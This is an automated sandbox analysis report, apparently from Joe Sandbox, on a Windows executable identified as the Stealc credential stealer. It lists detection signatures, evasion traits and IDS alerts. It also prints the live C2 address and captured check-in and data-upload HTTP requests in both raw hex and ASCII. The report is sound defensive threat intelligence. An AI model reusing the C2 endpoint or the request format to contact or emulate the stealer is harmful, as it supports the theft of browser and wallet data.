Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1502482
MD5:e327e97714aa25537fde40f3c48efde7
SHA1:428bbb6bf12584eda0e0d9c7ba8451e792e08507
SHA256:2d4680a8ec9567082b77baef594ca11f2a509c4bae189a239855e00d357c7a34
Tags:exe
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Downloads executable code via HTTP
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 3424 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E327E97714AA25537FDE40F3C48EFDE7)
    • WerFault.exe (PID: 4292 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 1600 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2800489909.000000000038A000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        Process Memory Space: file.exe PID: 3424JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: file.exe PID: 3424JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: file.exe PID: 3424JoeSecurity_StealcYara detected StealcJoe Security
              No Sigma rule has matched
              Timestamp:2024-09-01T20:54:06.895741+0200
              SID:2803304
              Severity:3
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-09-01T20:54:06.322810+0200
              SID:2044248
              Severity:1
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-09-01T20:53:59.714165+0200
              SID:2044244
              Severity:1
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-09-01T20:54:03.639606+0200
              SID:2044247
              Severity:1
              Source Port:80
              Destination Port:49704
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-09-01T20:54:00.006452+0200
              SID:2044246
              Severity:1
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-09-01T20:53:59.416144+0200
              SID:2044243
              Severity:1
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-09-01T20:53:59.720314+0200
              SID:2044245
              Severity:1
              Source Port:80
              Destination Port:49704
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: http://185.215.113.100/e2b1563c6670f193.phpURL Reputation: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllURL Reputation: Label: malware
              Source: http://185.215.113.100URL Reputation: Label: malware
              Source: http://185.215.113.100/URL Reputation: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpWmAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllqAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpUserAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpion:Avira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpxAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpinit.exeAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.php7mHAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllcAvira URL Cloud: Label: malware
              Source: 00000000.00000002.2800489909.000000000038A000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}
              Source: http://185.215.113.100/e2b1563c6670f193.phpUserVirustotal: Detection: 15%Perma Link
              Source: http://185.215.113.100/e2b1563c6670f193.phpion:Virustotal: Detection: 6%Perma Link
              Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllqVirustotal: Detection: 18%Perma Link
              Source: http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZVirustotal: Detection: 15%Perma Link
              Source: http://185.215.113.100/e2b1563c6670f193.phpinit.exeVirustotal: Detection: 17%Perma Link
              Source: http://185.215.113.100/e2b1563c6670f193.phpxVirustotal: Detection: 11%Perma Link
              Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllcVirustotal: Detection: 18%Perma Link
              Source: file.exeVirustotal: Detection: 41%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: file.exeJoe Sandbox ML: detected
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.100:80
              Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.100:80
              Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.100:80 -> 192.168.2.5:49704
              Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.100:80
              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.100:80 -> 192.168.2.5:49704
              Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.100:80
              Source: Malware configuration extractorURLs: http://185.215.113.100/e2b1563c6670f193.php
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 18:54:06 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFCAFCFBAEHIDHJDBGCHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 45 33 30 31 41 33 36 35 42 30 33 35 35 35 35 31 34 32 33 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 2d 2d 0d 0a Data Ascii: ------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="hwid"F0E301A365B03555514232------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="build"leva------BKFCAFCFBAEHIDHJDBGC--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJKHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 31 33 31 35 30 64 31 63 36 63 33 35 36 38 64 34 66 39 63 35 62 33 37 64 64 38 65 66 66 33 66 36 35 35 62 66 37 66 66 38 38 62 63 38 33 63 31 36 37 30 33 30 39 37 61 33 34 30 33 63 64 63 62 32 66 34 65 37 37 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="token"2d13150d1c6c3568d4f9c5b37dd8eff3f655bf7ff88bc83c16703097a3403cdcb2f4e77e------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="message"browsers------BGCBGCAFIIECBFIDHIJK--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECGHost: 185.215.113.100Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 31 33 31 35 30 64 31 63 36 63 33 35 36 38 64 34 66 39 63 35 62 33 37 64 64 38 65 66 66 33 66 36 35 35 62 66 37 66 66 38 38 62 63 38 33 63 31 36 37 30 33 30 39 37 61 33 34 30 33 63 64 63 62 32 66 34 65 37 37 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 2d 2d 0d 0a Data Ascii: ------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="token"2d13150d1c6c3568d4f9c5b37dd8eff3f655bf7ff88bc83c16703097a3403cdcb2f4e77e------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="message"plugins------KFIIJJJDGCBAAKFIIECG--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGIDHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 31 33 31 35 30 64 31 63 36 63 33 35 36 38 64 34 66 39 63 35 62 33 37 64 64 38 65 66 66 33 66 36 35 35 62 66 37 66 66 38 38 62 63 38 33 63 31 36 37 30 33 30 39 37 61 33 34 30 33 63 64 63 62 32 66 34 65 37 37 65 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 2d 2d 0d 0a Data Ascii: ------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="token"2d13150d1c6c3568d4f9c5b37dd8eff3f655bf7ff88bc83c16703097a3403cdcb2f4e77e------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="message"fplugins------BKJKJEHJJDAKECBFCGID--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJHost: 185.215.113.100Content-Length: 5531Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 185.215.113.100 185.215.113.100
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.100:80
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFCAFCFBAEHIDHJDBGCHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 45 33 30 31 41 33 36 35 42 30 33 35 35 35 35 31 34 32 33 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 2d 2d 0d 0a Data Ascii: ------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="hwid"F0E301A365B03555514232------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="build"leva------BKFCAFCFBAEHIDHJDBGC--
              Source: file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100
              Source: file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/
              Source: file.exe, 00000000.00000002.2800489909.000000000038A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2801350861.0000000001212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dll
              Source: file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dllc
              Source: file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dllq
              Source: file.exe, 00000000.00000002.2800489909.000000000038A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2801350861.0000000001212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php
              Source: file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php7mH
              Source: file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpUser
              Source: file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpWm
              Source: file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ
              Source: file.exe, 00000000.00000002.2800489909.000000000035C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpinit.exe
              Source: file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpion:
              Source: file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpx
              Source: file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.1000d60be0de163924d/sqlite3.dllY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZG
              Source: file.exe, 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100:
              Source: file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100GIJ
              Source: file.exe, 00000000.00000002.2800489909.0000000000321000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2800489909.000000000035C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100s.exe
              Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
              Source: file.exe, 00000000.00000002.2821491143.0000000061ED3000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 1600
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
